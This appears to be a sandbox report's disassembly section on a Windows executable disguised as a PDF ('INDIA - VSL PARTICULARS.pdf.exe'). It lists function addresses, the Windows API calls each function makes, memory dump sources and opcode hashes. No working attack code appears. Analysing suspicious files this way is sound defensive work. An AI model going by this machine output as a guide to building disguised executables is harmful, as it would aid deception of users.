                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend$LongWindow
                              • String ID:
                              • API String ID: 312131281-0
                              • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                              • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                              • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                              • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                              Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                              • SendMessageW.USER32(769523D0,00001001,00000000,?), ref: 00448E16
                              • SendMessageW.USER32(769523D0,00001026,00000000,?), ref: 00448E25
                                • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend$BrushCreateDeleteObjectSolid
                              • String ID:
                              • API String ID: 3771399671-0
                              • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                              • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                              • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                              • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                              Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 00434643
                              • GetForegroundWindow.USER32(00000000), ref: 00434655
                              • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                              • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                              • String ID:
                              • API String ID: 2156557900-0
                              • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                              • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                              • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                              • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                              Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                              • API String ID: 0-1603158881
                              • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                              • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                              • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                              • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                              Function 00401CB0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 240COMMON
                              Download Yara Rule
                              APIs
                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                              • DestroyWindow.USER32(?), ref: 00426F50
                              • UnregisterHotKey.USER32(?), ref: 00426F77
                              • FreeLibrary.KERNEL32(?), ref: 0042701F
                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                              • String ID: close all$#v
                              • API String ID: 4174999648-3101823635
                              • Opcode ID: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                              • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                              • Opcode Fuzzy Hash: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                              • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                              Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                              Download Yara Rule
                              APIs
                              • CreateMenu.USER32 ref: 00448603
                              • SetMenu.USER32(?,00000000), ref: 00448613
                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                              • IsMenu.USER32(?), ref: 004486AB
                              • CreatePopupMenu.USER32 ref: 004486B5
                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                              • DrawMenuBar.USER32 ref: 004486F5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Menu$CreateItem$DrawInfoInsertPopup
                              • String ID: 0
                              • API String ID: 161812096-4108050209
                              • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                              • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                              • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                              • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                              Function 00434034 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe), ref: 00434057
                              • LoadStringW.USER32(00000000), ref: 00434060
                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                              • LoadStringW.USER32(00000000), ref: 00434078
                              • _wprintf.LIBCMT ref: 004340A1
                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                              Strings
                              • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                              • C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe, xrefs: 00434040
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: HandleLoadModuleString$Message_wprintf
                              • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe
                              • API String ID: 3648134473-1222234808
                              • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                              • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                              • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                              • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                              Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b5b2eb1c0fd75675c26b78e4e5fa3366e30ffffa818d49f3caf60ca944b06ede
                              • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                              • Opcode Fuzzy Hash: b5b2eb1c0fd75675c26b78e4e5fa3366e30ffffa818d49f3caf60ca944b06ede
                              • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                              Function 004561DA Relevance: 13.7, APIs: 9, Instructions: 164COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                              • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                              • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                              • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                              Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,0040F545,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,004A90E8,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,?,0040F545), ref: 0041013C
                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                              • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                              • MoveFileW.KERNEL32(?,?), ref: 00453932
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: File$AttributesFullMoveNamePathlstrcmpi
                              • String ID:
                              • API String ID: 978794511-0
                              • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                              • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                              • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                              • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                              Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                              • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                              • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                              • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                              Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ClearVariant
                              • String ID:
                              • API String ID: 1473721057-0
                              • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                              • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                              • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                              • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                              Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove$_memcmp
                              • String ID: '$\$h
                              • API String ID: 2205784470-1303700344
                              • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                              • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                              • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                              • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                              Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                              Download Yara Rule
                              APIs
                              • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                              • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                              • VariantClear.OLEAUT32 ref: 0045EA6D
                              • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                              • __swprintf.LIBCMT ref: 0045EC33
                              • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                              Strings
                              • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Variant$InitTime$ClearCopySystem__swprintf
                              • String ID: %4d%02d%02d%02d%02d%02d
                              • API String ID: 2441338619-1568723262
                              • Opcode ID: 88db3983bd4ed7f03cb514a0c18a36c5a2e0261ee80d3730b42f63d3e5698cbf
                              • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                              • Opcode Fuzzy Hash: 88db3983bd4ed7f03cb514a0c18a36c5a2e0261ee80d3730b42f63d3e5698cbf
                              • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                              Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                              Download Yara Rule
                              APIs
                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                              • Sleep.KERNEL32(0000000A), ref: 0042C67F
                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Interlocked$DecrementIncrement$Sleep
                              • String ID: @COM_EVENTOBJ
                              • API String ID: 327565842-2228938565
                              • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                              • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                              • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                              • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                              Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                              Download Yara Rule
                              APIs
                              • VariantClear.OLEAUT32(?), ref: 0047031B
                              • VariantClear.OLEAUT32(?), ref: 0047044F
                              • VariantInit.OLEAUT32(?), ref: 004704A3
                              • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                              • VariantClear.OLEAUT32(?), ref: 00470516
                                • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                              • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                              • VariantClear.OLEAUT32(00000000), ref: 0047060D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
